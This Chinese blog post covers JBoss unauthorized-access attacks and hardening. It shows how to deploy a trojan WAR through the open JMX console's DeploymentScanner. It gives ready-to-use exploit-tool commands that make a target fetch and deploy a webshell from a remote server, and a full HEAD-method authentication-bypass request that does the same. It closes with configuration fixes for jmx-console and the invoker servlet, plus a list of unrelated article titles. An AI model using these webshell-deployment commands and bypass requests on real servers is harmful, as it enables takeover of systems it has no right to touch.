1,Jboss未授权访问部署木马

发现存在Jboss默认页面,点进控制页



点击 Jboss.deployment 进入应用部署页面

也可以直接输入此URL进入

http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL



搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署



部署成功,访问木马地址



最后附上一个jboss未授权访问EXP,备用,使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.远程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:
www.any.com:8080/no/index.jsp

2.jboss加固

(1)目录

C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\jmx-console.war\WEB-INF

下的 jboss-web.xml

把 security-domain 注释去掉。



web.xml

把 GET 和 POST 两行注释掉,同时 security-constraint 整个部分不要注释掉,不然存在head头绕过

<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with the role JBossAdmin to access the HTML JMX console web application </description>
<url-pattern>/*</url-pattern>
<!-<http-method>GET</http-method>
<http-method>POST</http-method> -->
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>

(2)目录

C:\Program Files\Java\jboss-4.2.3.GA\server\default\conf\props\jbossws-users.properties

加上登录用户名密码

3.jboss head绕过上传

数据包

HEAD YWRtaW46YWRtaW4=/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodIndex=7&arg0=http://192.168.91.139/h.war  HTTP/1.1
Host: 192.168.91.108:8080
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://192.168.91.108:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Referer: http://192.168.91.108:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 4

jboss invoke接口修复

C:\Program Files\Java\jboss-4.2.3.GA\server\default\deploy\http-invoker.sar\invoker.war\WEB-INF

server/$CONFIG/deploy/http-invoker.sar/http-invoker.war/WEB-INF/w

eb.xml 文件,将标签中的

url-pattern 修改为/*,并注释掉其中的两个 http-method。

最新文章

  1. iOS 面试题(四):block 什么时候需要构造循环引用 --转自唐巧
  2. 屏蔽zencart logs文件夹下不断生成的日志文件
  3. tar.xz文件解压
  4. 修改Apache配置文件开启gzip压缩传输
  5. ActiveMQ第四弹:在HermesJMS中创建ActiveMQ Session
  6. setAnimationTransition:forView:cache: 运行动画时背景色问题
  7. Codeforces4D - Mysterious Present(LIS)
  8. Delphi 用Web App Debugger简单调试ISAPI 转
  9. 有关Spring Batch
  10. &lt;c:if&gt;标签
  11. Kotlin初探
  12. 牛客网:将两个单调递增的链表合并为一个单调递增的链表-Python实现-两种方法讲解
  13. bootstrap簡介
  14. Quartz.net设置任务中同时最多运行一个实例 [DisallowConcurrentExecution]
  15. 第14月第17天 automaticallyAdjustsScrollViewInsets contentInsetAdjustmentBehavior
  16. git版本控制工具的使用(1)。
  17. ES6中变量解构的用途—遍历Map结构
  18. Python 爬虫实例(15) 爬取 百度百聘(微信公众号)
  19. Introduction to MyBatis Generator Mybatis代码生成介绍
  20. socket.io api 总结

热门文章

  1. os.getcwd()、sys.path[0]、sys.argv[0]和__file__的区别,终于弄清楚了
  2. Linux知识积累(1)awk的使用方法
  3. Spring Security入门(3-7)Spring Security处理页面的ajax请求
  4. 查看centos版本及32还是64位
  5. Java面试题—初级(2)
  6. Text-文本检查
  7. JS面向对象之原型链
  8. delphi 10.1 Berlin 中使用自带的 Base64 编码
  9. requests之一:HTTP请求 状态码
  10. contenteditable 插入及粘贴纯文本内容